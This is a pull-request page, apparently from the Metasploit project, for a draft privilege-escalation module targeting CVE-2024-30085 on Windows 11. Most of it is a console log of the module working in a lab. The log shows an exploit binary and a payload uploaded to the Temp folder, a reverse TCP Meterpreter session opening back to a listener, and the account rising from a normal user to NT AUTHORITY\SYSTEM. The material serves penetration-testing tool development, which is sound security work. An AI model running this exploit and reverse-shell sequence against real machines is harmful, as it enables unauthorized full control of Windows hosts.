Working Draft for cve-2024-30085 #19802

Draft
wants to merge 2 commits into
base: master

bwatters-r7 (Contributor) commented Jan 10, 2025

This is a draft with just the working exe for CVE-2024-30085

Closes #19768
For future me, this is Windows 11 23H2 8EA9.

bwatters-r7 (Contributor, Author) commented:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN11_23H2_8EA9
OS              : Windows 11 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN11_23H2_8EA9\msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2024_30085_cloud_files
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30085_cloud_files) > show options

Module options (exploit/windows/local/cve_2024_30085_cloud_files):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXECUTE_DELAY    3                yes       The number of seconds to delay between file upload and exploit launch
   EXPLOIT_NAME                      no        The filename to use for the exploit binary (%RAND% by default).
   EXPLOIT_TIMEOUT  60               yes       The number of seconds to wait for exploit to finish running
   PAYLOAD_NAME                      no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   SESSION                           yes       The session to run this module on
   WRITABLE_DIR                      no        Path to write binaries (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2024_30085_cloud_files) > set session 1
session => 1
msf6 exploit(windows/local/cve_2024_30085_cloud_files) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on WIN11_23H2_8EA9 via session ID: 1
[*] Exploit uploaded on WIN11_23H2_8EA9 to C:\Users\msfuser\AppData\Local\Temp\uMdIlvIvaW.exe
[*] Payload (7168 bytes) uploaded on WIN11_23H2_8EA9 to C:\Users\msfuser\AppData\Local\Temp\CBuglYAuy.exe
[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\CBuglYAuy.exe
[*] Sending stage (203846 bytes) to 10.5.132.111
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.111:49723) at 2025-01-29 17:33:12 -0600
[-] Caught timeout.  Exploit may be taking longer or it may have failed.
[*] C:\Users\msfuser\AppData\Local\Temp\uMdIlvIvaW.exe already exists on the target. Deleting...
[-] Unable to delete C:\Users\msfuser\AppData\Local\Temp\uMdIlvIvaW.exe

meterpreter > sysinfo
Computer        : WIN11_23H2_8EA9
OS              : Windows 11 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


Successfully merging this pull request may close these issues.

CVE-2024-30085: Windows Elevation of Privilege